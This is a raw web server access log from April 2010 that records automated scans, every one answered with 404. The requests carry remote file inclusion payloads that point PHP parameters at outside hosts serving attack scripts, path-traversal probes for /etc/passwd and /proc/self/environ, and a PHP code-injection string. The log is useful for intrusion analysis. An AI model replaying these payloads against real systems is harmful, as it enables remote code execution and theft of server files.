189.108.172.26 - - [16/Apr/2010:08:43:31 -0500] "GET /logs/access_log.1268956800%20%20//write_update.php?board_skin_path=http://www.pointcominfo.com/phpBB2/id1.txt???????? HTTP/1.1" 404 330 "-""Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:08:43:49 -0500] "GET /logs/access_log.1219708800%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://craftique.org/image/id1.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:08:43:49 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://craftique.org/image/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:08:43:49 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://craftique.org/image/id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:08:43:49 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://craftique.org/image/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:08:43:50 -0500] "GET /logs/access_log.1219708800%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://craftique.org/image/id1.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:08:43:50 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://craftique.org/image/id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:08:45:04 -0500] "GET /logs/access_log.1212969600//phpsecurityadmin/include/logout.php?PSA_PATH=http://craftique.org/image/id1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:08:45:04 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://craftique.org/image/id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:08:45:04 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://craftique.org/image/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:08:45:06 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://craftique.org/image/id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:08:45:06 -0500] "GET /logs/access_log.1212969600//phpsecurityadmin/include/logout.php?PSA_PATH=http://craftique.org/image/id1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:08:45:06 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://craftique.org/image/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
222.96.156.84 - - [16/Apr/2010:08:45:47 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://hasslefreetours.co.za/wp-content/id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
222.96.156.84 - - [16/Apr/2010:08:45:47 -0500] "GET /logs/access_log.1212969600//phpsecurityadmin/include/logout.php?PSA_PATH=http://hasslefreetours.co.za/wp-content/id1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
222.96.156.84 - - [16/Apr/2010:08:45:47 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://hasslefreetours.co.za/wp-content/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:08:46:38 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://craftique.org/image/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:08:46:38 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://craftique.org/image/id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:08:46:38 -0500] "GET /logs/access_log.1219708800//phpsecurityadmin/include/logout.php?PSA_PATH=http://craftique.org/image/id1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
222.96.156.84 - - [16/Apr/2010:08:46:41 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://hasslefreetours.co.za/wp-content/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
222.96.156.84 - - [16/Apr/2010:08:46:41 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://hasslefreetours.co.za/wp-content/id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
222.96.156.84 - - [16/Apr/2010:08:46:41 -0500] "GET /logs/access_log.1212969600//phpsecurityadmin/include/logout.php?PSA_PATH=http://hasslefreetours.co.za/wp-content/id1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:08:46:44 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://craftique.org/image/id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:08:46:44 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://craftique.org/image/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:08:46:44 -0500] "GET /logs/access_log.1219708800//phpsecurityadmin/include/logout.php?PSA_PATH=http://craftique.org/image/id1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:08:47:06 -0500] "GET /logs/access_log.1213228800//phpsecurityadmin/include/logout.php?PSA_PATH=http://craftique.org/image/id1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:08:48:18 -0500] "GET /logs/access_log.1214784000//phpsecurityadmin/include/logout.php?PSA_PATH=http://craftique.org/image/id1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
211.174.185.131 - - [16/Apr/2010:08:48:50 -0500] "GET /logs/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
211.174.185.131 - - [16/Apr/2010:08:48:50 -0500] "GET /logs/access_log.1219363200%20%20/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 348 "-""Mozilla/5.0"
211.174.185.131 - - [16/Apr/2010:08:48:50 -0500] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
116.122.36.61 - - [16/Apr/2010:08:51:53 -0500] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://200.199.242.22/images/.ajim/ajim1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
116.122.36.61 - - [16/Apr/2010:08:51:53 -0500] "GET /logs/access_log.1220054400%20%20//modules/agendax/addevent.inc.php?agendax_path=http://200.199.242.22/images/.ajim/ajim1.txt? HTTP/1.1" 404 346 "-""Mozilla/5.0"
116.122.36.61 - - [16/Apr/2010:08:51:53 -0500] "GET //modules/agendax/addevent.inc.php?agendax_path=http://200.199.242.22/images/.ajim/ajim1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
200.62.142.217 - - [16/Apr/2010:08:52:14 -0500] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.wdiet.co.kr/include/openview/sc1??? HTTP/1.1" 404 343 "-""Mozilla/5.0"
200.62.142.217 - - [16/Apr/2010:08:52:14 -0500] "GET /logs/access_log.1268265600/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.wdiet.co.kr/include/openview/sc1??? HTTP/1.1" 404 370 "-""Mozilla/5.0"
200.62.142.217 - - [16/Apr/2010:08:52:14 -0500] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.wdiet.co.kr/include/openview/sc1??? HTTP/1.1" 404 348 "-""Mozilla/5.0"
116.122.36.61 - - [16/Apr/2010:08:54:23 -0500] "GET //modules/agendax/addevent.inc.php?agendax_path=http://200.199.242.22/images/.ajim/ajim1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
116.122.36.61 - - [16/Apr/2010:08:54:23 -0500] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://200.199.242.22/images/.ajim/ajim1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
116.122.36.61 - - [16/Apr/2010:08:54:23 -0500] "GET /logs/access_log.1220054400%20%20//modules/agendax/addevent.inc.php?agendax_path=http://200.199.242.22/images/.ajim/ajim1.txt? HTTP/1.1" 404 346 "-""Mozilla/5.0"
212.241.177.123 - - [16/Apr/2010:08:57:17 -0500] "GET /logs/access_log.1214784000/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt?? HTTP/1.1" 404 355 "-""Mozilla/5.0"
212.241.177.123 - - [16/Apr/2010:08:57:17 -0500] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
212.241.177.123 - - [16/Apr/2010:08:57:17 -0500] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
116.122.36.61 - - [16/Apr/2010:09:00:29 -0500] "GET /logs/access_log.1212192000///index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
116.122.36.61 - - [16/Apr/2010:09:00:29 -0500] "GET ///index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 295 "-""Mozilla/5.0"
116.122.36.61 - - [16/Apr/2010:09:00:29 -0500] "GET /logs///index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 300 "-""Mozilla/5.0"
164.115.5.63 - - [16/Apr/2010:09:00:49 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://lemoland.ru/forum/images/id1.txt?? HTTP/1.0" 404 290 "-""Mozilla/5.0"
164.115.5.63 - - [16/Apr/2010:09:00:49 -0500] "GET /logs/access_log.1268956800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://lemoland.ru/forum/images/id1.txt?? HTTP/1.0" 404 312 "-""Mozilla/5.0"
164.115.5.63 - - [16/Apr/2010:09:00:49 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://lemoland.ru/forum/images/id1.txt?? HTTP/1.0" 404 285 "-""Mozilla/5.0"
164.115.5.63 - - [16/Apr/2010:09:01:56 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://lemoland.ru/forum/images/id1.txt?? HTTP/1.0" 404 285 "-""Mozilla/5.0"
164.115.5.63 - - [16/Apr/2010:09:01:56 -0500] "GET /logs/access_log.1268956800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://lemoland.ru/forum/images/id1.txt?? HTTP/1.0" 404 312 "-""Mozilla/5.0"
164.115.5.63 - - [16/Apr/2010:09:01:56 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://lemoland.ru/forum/images/id1.txt?? HTTP/1.0" 404 290 "-""Mozilla/5.0"
89.111.177.26 - - [16/Apr/2010:09:02:45 -0500] "GET /logs/access_log.1267920000%20%20/home.php?pagina=http://stul.netsolutions.cz/img/.emergency/x.pl??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
89.111.177.26 - - [16/Apr/2010:09:02:45 -0500] "GET /logs/access_log.1219363200%20%20/home.php?pagina=http://stul.netsolutions.cz/img/.emergency/x.pl??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
89.111.177.26 - - [16/Apr/2010:09:02:45 -0500] "GET /home.php?pagina=http://stul.netsolutions.cz/img/.emergency/x.pl??? HTTP/1.1" 404 292 "-""Mozilla/5.0"
89.111.177.26 - - [16/Apr/2010:09:02:45 -0500] "GET /logs/home.php?pagina=http://stul.netsolutions.cz/img/.emergency/x.pl??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
164.115.5.63 - - [16/Apr/2010:09:03:33 -0500] "GET /logs/access_log.1270684800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://lemoland.ru/forum/images/id1.txt?? HTTP/1.0" 404 312 "-""Mozilla/5.0"
164.115.5.63 - - [16/Apr/2010:09:05:04 -0500] "GET /logs/access_log.1270684800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://lemoland.ru/forum/images/id1.txt?? HTTP/1.0" 404 314 "-""Mozilla/5.0"
164.115.5.63 - - [16/Apr/2010:09:05:04 -0500] "GET /logs/access_log.1268956800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://lemoland.ru/forum/images/id1.txt?? HTTP/1.0" 404 314 "-""Mozilla/5.0"
164.115.5.63 - - [16/Apr/2010:09:05:50 -0500] "GET /logs/access_log.1268956800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://lemoland.ru/forum/images/id1.txt?? HTTP/1.0" 404 314 "-""Mozilla/5.0"
164.115.5.63 - - [16/Apr/2010:09:05:50 -0500] "GET /logs/access_log.1270684800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://lemoland.ru/forum/images/id1.txt?? HTTP/1.0" 404 314 "-""Mozilla/5.0"
217.70.32.2 - - [16/Apr/2010:09:09:13 -0500] "GET /logs/access_log.1262476800//dotproject/modules/tasks/viewgantt.php?root_dir=http://dbdb.interfree.it/FxID1.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
217.70.32.2 - - [16/Apr/2010:09:09:13 -0500] "GET /logs//dotproject/modules/tasks/viewgantt.php?root_dir=http://dbdb.interfree.it/FxID1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
217.70.32.2 - - [16/Apr/2010:09:09:13 -0500] "GET //dotproject/modules/tasks/viewgantt.php?root_dir=http://dbdb.interfree.it/FxID1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
204.202.238.67 - - [16/Apr/2010:09:10:28 -0500] "GET //admin.php?PHPFFL_FILE_ROOT=' HTTP/1.1" 404 294 "-""libwww-perl/5.805"
204.202.238.67 - - [16/Apr/2010:09:10:45 -0500] "GET /logs/access_log.1219363200//admin.php?PHPFFL_FILE_ROOT=' HTTP/1.1" 404 321 "-""libwww-perl/5.805"
204.202.238.67 - - [16/Apr/2010:09:10:48 -0500] "GET //admin.php?PHPFFL_FILE_ROOT=' HTTP/1.1" 404 294 "-""libwww-perl/5.805"
204.202.238.67 - - [16/Apr/2010:09:10:49 -0500] "GET /logs//admin.php?PHPFFL_FILE_ROOT=' HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.111.177.26 - - [16/Apr/2010:09:14:50 -0500] "GET /logs/access_log.1267920000/home.php?pagina=http://stul.netsolutions.cz/img/.emergency/x.pl??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
89.111.177.26 - - [16/Apr/2010:09:14:50 -0500] "GET /logs/access_log.1219363200/home.php?pagina=http://stul.netsolutions.cz/img/.emergency/x.pl??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
118.217.216.132 - - [16/Apr/2010:09:15:47 -0500] "GET /logs/access_log.1212105600%20%20//bbs//////delete_all.php?board_skin_path=http://www.backto.co.kr//data/file/faq/id1.txt?????????????? HTTP/1.1" 404 337 "-""Mozilla/5.0"
118.217.216.132 - - [16/Apr/2010:09:15:47 -0500] "GET //bbs//////delete_all.php?board_skin_path=http://www.backto.co.kr//data/file/faq/id1.txt?????????????? HTTP/1.1" 404 308 "-""Mozilla/5.0"
118.217.216.132 - - [16/Apr/2010:09:15:47 -0500] "GET /logs//bbs//////delete_all.php?board_skin_path=http://www.backto.co.kr//data/file/faq/id1.txt?????????????? HTTP/1.1" 404 313 "-""Mozilla/5.0"
207.46.204.229 - - [16/Apr/2010:09:21:20 -0500] "GET /logs/access_log.1208649600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
217.70.32.2 - - [16/Apr/2010:09:22:53 -0500] "GET /logs/access_log.1220054400//My_eGallery/public/displayCategory.php?basepath=http://dbdb.interfree.it/FxID1.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
217.70.32.2 - - [16/Apr/2010:09:22:53 -0500] "GET //My_eGallery/public/displayCategory.php?basepath=http://dbdb.interfree.it/FxID1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
217.70.32.2 - - [16/Apr/2010:09:22:53 -0500] "GET /logs//My_eGallery/public/displayCategory.php?basepath=http://dbdb.interfree.it/FxID1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
92.48.74.7 - - [16/Apr/2010:09:23:46 -0500] "GET /logs///s_loadenv.inc.php?DOCUMENT_ROOT=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 308 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1) Gecko/"
92.48.74.7 - - [16/Apr/2010:09:23:47 -0500] "GET ///s_loadenv.inc.php?DOCUMENT_ROOT=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 303 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1"
209.16.102.2 - - [16/Apr/2010:09:25:35 -0500] "GET /logs///s_loadenv.inc.php?DOCUMENT_ROOT=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 308 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1"
209.16.102.2 - - [16/Apr/2010:09:25:35 -0500] "GET ///s_loadenv.inc.php?DOCUMENT_ROOT=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 303 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
64.165.76.12 - - [16/Apr/2010:09:25:53 -0500] "GET /logs///s_loadenv.inc.php?DOCUMENT_ROOT=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 308 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
64.165.76.12 - - [16/Apr/2010:09:25:53 -0500] "GET ///s_loadenv.inc.php?DOCUMENT_ROOT=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 303 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1"
96.30.15.216 - - [16/Apr/2010:09:26:14 -0500] "GET /logs///s_loadenv.inc.php?DOCUMENT_ROOT=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 308 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
96.30.15.216 - - [16/Apr/2010:09:26:14 -0500] "GET ///s_loadenv.inc.php?DOCUMENT_ROOT=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 303 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
69.175.12.18 - - [16/Apr/2010:09:26:22 -0500] "GET /logs//linkadmin.php?page=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 303 "-""Mozilla/5.0"
69.175.12.18 - - [16/Apr/2010:09:26:22 -0500] "GET //linkadmin.php?page=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
69.175.12.18 - - [16/Apr/2010:09:26:22 -0500] "GET /logs/access_log.1265760000//linkadmin.php?page=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
207.46.13.137 - - [16/Apr/2010:09:28:49 -0500] "GET /logs/access_log.1226448000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
212.241.177.123 - - [16/Apr/2010:09:29:33 -0500] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
212.241.177.123 - - [16/Apr/2010:09:29:33 -0500] "GET /akocomments.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
212.241.177.123 - - [16/Apr/2010:09:29:33 -0500] "GET /logs/access_log.1220054400/akocomments.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
85.214.25.33 - - [16/Apr/2010:09:29:49 -0500] "GET ///index.php?option=com_projectfork§ion=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
85.214.25.33 - - [16/Apr/2010:09:29:49 -0500] "GET /logs///index.php?option=com_projectfork§ion=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.805"
67.195.112.180 - - [16/Apr/2010:09:30:02 -0500] "GET /logs/access_log.1162944000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
124.49.100.254 - - [16/Apr/2010:09:30:50 -0500] "GET /logs/access_log.1220054400%20%20//modules/xfsection/modify.php?dir_module=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:09:30:50 -0500] "GET //modules/xfsection/modify.php?dir_module=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:09:30:50 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:09:30:54 -0500] "GET //modules/xfsection/modify.php?dir_module=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:09:30:54 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:09:30:57 -0500] "GET /logs/access_log.1220054400%20%20//modules/xfsection/modify.php?dir_module=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:09:30:58 -0500] "GET //modules/xfsection/modify.php?dir_module=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:09:30:58 -0500] "GET /logs/access_log.1220054400%20%20//modules/xfsection/modify.php?dir_module=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:09:30:58 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
64.79.143.7 - - [16/Apr/2010:09:30:59 -0500] "GET /logs/access_log.1243036800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051013 Debian/1.7.12-1ubuntu1"
124.49.100.254 - - [16/Apr/2010:09:31:05 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:09:31:05 -0500] "GET //modules/xfsection/modify.php?dir_module=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:09:31:05 -0500] "GET /logs/access_log.1220054400%20%20//modules/xfsection/modify.php?dir_module=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
187.4.128.12 - - [16/Apr/2010:09:31:06 -0500] "GET /logs/access_log.1243036800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051013 Debian/1.7.12-1ubuntu1"
124.49.100.254 - - [16/Apr/2010:09:31:06 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:09:31:07 -0500] "GET //modules/xfsection/modify.php?dir_module=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:09:31:07 -0500] "GET /logs/access_log.1220054400%20%20//modules/xfsection/modify.php?dir_module=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:09:31:18 -0500] "GET //modules/xfsection/modify.php?dir_module=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
85.214.25.33 - - [16/Apr/2010:09:31:18 -0500] "GET ///index.php?option=com_projectfork§ion=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
85.214.25.33 - - [16/Apr/2010:09:31:18 -0500] "GET /logs///index.php?option=com_projectfork§ion=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.805"
124.49.100.254 - - [16/Apr/2010:09:31:19 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:09:31:19 -0500] "GET /logs/access_log.1220054400%20%20//modules/xfsection/modify.php?dir_module=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
116.122.36.61 - - [16/Apr/2010:09:34:18 -0500] "GET /logs////skin/happycast_category_lightblack/setup.php?dir=http://takesi.freewebhostx.com/fx29id1.txt??????? HTTP/1.1" 404 336 "-""Mozilla/5.0"
116.122.36.61 - - [16/Apr/2010:09:34:18 -0500] "GET /logs/access_log.1268265600%20%20////skin/happycast_category_lightblack/setup.php?dir=http://takesi.freewebhostx.com/fx29id1.txt??????? HTTP/1.1" 404 360 "-""Mozilla/5.0"
116.122.36.61 - - [16/Apr/2010:09:34:18 -0500] "GET ////skin/happycast_category_lightblack/setup.php?dir=http://takesi.freewebhostx.com/fx29id1.txt??????? HTTP/1.1" 404 331 "-""Mozilla/5.0"
116.122.36.61 - - [16/Apr/2010:09:34:20 -0500] "GET /logs/access_log.1268265600%20%20////skin/happycast_category_lightblack/setup.php?dir=http://takesi.freewebhostx.com/fx29id1.txt??????? HTTP/1.1" 404 360 "-""Mozilla/5.0"
116.122.36.61 - - [16/Apr/2010:09:34:20 -0500] "GET ////skin/happycast_category_lightblack/setup.php?dir=http://takesi.freewebhostx.com/fx29id1.txt??????? HTTP/1.1" 404 331 "-""Mozilla/5.0"
116.122.36.61 - - [16/Apr/2010:09:34:20 -0500] "GET /logs////skin/happycast_category_lightblack/setup.php?dir=http://takesi.freewebhostx.com/fx29id1.txt??????? HTTP/1.1" 404 336 "-""Mozilla/5.0"
81.208.34.38 - - [16/Apr/2010:09:37:50 -0500] "GET //linkadmin.php?page=http://stul.netsolutions.cz/img/.emergency/id1.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
81.208.34.38 - - [16/Apr/2010:09:37:50 -0500] "GET /logs//linkadmin.php?page=http://stul.netsolutions.cz/img/.emergency/id1.txt??? HTTP/1.1" 404 303 "-""Mozilla/5.0"
